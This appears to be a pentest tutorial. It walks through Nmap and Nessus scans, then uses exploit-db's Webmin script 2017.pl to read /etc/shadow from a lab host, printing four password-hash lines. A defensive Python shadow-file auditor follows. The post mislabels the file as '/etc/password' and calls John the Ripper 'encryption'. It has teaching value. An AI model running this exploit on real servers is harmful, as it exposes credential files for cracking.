THE STEPS
- INFORMATION GATHERING
  I did the information gathering with Nmap. In the picture we can see the services and ports that are running on the host.
- SERVICE ENUMERATION
  Now we know the services that are running on the host:
  Port 22 Service SSH
  Port 80 Service HTTP
  Port 139 Service netbios-ssn Samba
  Port 445 Service netbios-ssn Samba
  Port 10000/tcp Service HTTP
- VULNERABILITY IDENTIFICATION
  For the vulnerability assessment, this time I am using Nessus. Because I am looking for information about the username and password of the web application, I took the initiative to look at the vulnerabilities on port 10000, and I found a vulnerability there.

  Then I opened http://192.168.0.112 in the browser, which showed the screen in the picture. After that I opened port 10000 at http://192.168.0.112:10000, which showed the screen in the picture. I'm sorry about this picture; the right picture is behind the terminal. We can see a login form that needs a user name and password.

  From the Nessus information I know that I must look for Webmin, and look for it with metasploit.db.

  root@sinobi:/pentest/exploits/exploitdb#
  root@sinobi:/pentest/exploits/exploitdb# ./searchsploit webmin

  After that:

  root@sinobi:/pentest/exploits/exploitdb# cp platforms/multiple/remote/2017.pl

  After we copy the file, we can open it, for example with kwrite. This is the file 2017.pl, and it is written in Perl. After reading the file you must know that http = 0 and https = 1. This information is used when we run the command, like this:

  root@sinobi:/home#perl 2017.pl ip port /etc/password http/https
  root@sinobi:/home#perl 2017.pl 192.168.0.112 10000 /etc/password 0

  And the result of the command is:
vmware:$1$7nwi9F/D$AkdCcO2UfsCOM0IC8BYBb/:14042:0:99999:7:::
obama:$1$hvDHcCfx$pj78hUduionhij9q9JrtA0:14041:0:99999:7:::
osama:$1$Kqiv9qBp$eJg2uGCrOHoXGq0h5ehwe.:14041:0:99999:7:::
yomama:$1$tI4FJ.kP$wgDmweY9SAzJZYqW76oDA.:14041:0:99999:7:::

This is the information we get from /etc/shadow.

OK, in the next lesson I will explain how to encrypt passwords using JTR.
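
The entries above can also be read from the defender's side: each line follows the shadow(5) field layout, the `$1$` prefix marks MD5-crypt, and a maximum age of 99999 means the password never expires. The script below is an added example, not part of the original post; the function names and the acceptable/weak ratings in `SCHEMES` are assumptions of this example.

```python
from datetime import date, timedelta

# Modular-crypt prefixes -> (scheme name, acceptable today?). The ratings are
# this example's assumption, not something stated on the page.
SCHEMES = {"1": ("md5crypt", False), "5": ("sha256crypt", True),
           "6": ("sha512crypt", True), "y": ("yescrypt", True),
           "2a": ("bcrypt", True), "2b": ("bcrypt", True), "2y": ("bcrypt", True)}

# The four entries from the command output shown above.
SAMPLE = """\
vmware:$1$7nwi9F/D$AkdCcO2UfsCOM0IC8BYBb/:14042:0:99999:7:::
obama:$1$hvDHcCfx$pj78hUduionhij9q9JrtA0:14041:0:99999:7:::
osama:$1$Kqiv9qBp$eJg2uGCrOHoXGq0h5ehwe.:14041:0:99999:7:::
yomama:$1$tI4FJ.kP$wgDmweY9SAzJZYqW76oDA.:14041:0:99999:7:::
"""

def classify(pw):
    """Return (scheme, weak?) for the password field of one shadow entry."""
    if pw == "":
        return "empty", True
    if pw[0] in "!*":
        return "locked", False
    if pw.startswith("$"):
        ident = pw.split("$")[1]
        name, ok = SCHEMES.get(ident, ("unknown-" + ident, False))
        return name, not ok
    return "descrypt", True  # no $id$ prefix: traditional DES crypt

def audit_shadow(text):
    """Parse shadow(5) lines and list per-account hygiene issues."""
    report = []
    for line in text.splitlines():
        f = line.strip().split(":")
        if len(f) < 9:
            continue  # not a complete shadow entry
        scheme, weak = classify(f[1])
        issues = ["weak hash scheme: " + scheme] if weak else []
        # Field 5 is the maximum password age in days; 99999 disables expiry.
        if scheme != "locked" and f[4].isdigit() and int(f[4]) >= 99999:
            issues.append("password never expires")
        # Field 3 is the last change, counted in days since 1970-01-01.
        changed = (date(1970, 1, 1) + timedelta(days=int(f[2]))).isoformat() if f[2].isdigit() else None
        report.append({"user": f[0], "scheme": scheme, "last_changed": changed, "issues": issues})
    return report

if __name__ == "__main__":
    for entry in audit_shadow(SAMPLE):
        print(entry)
```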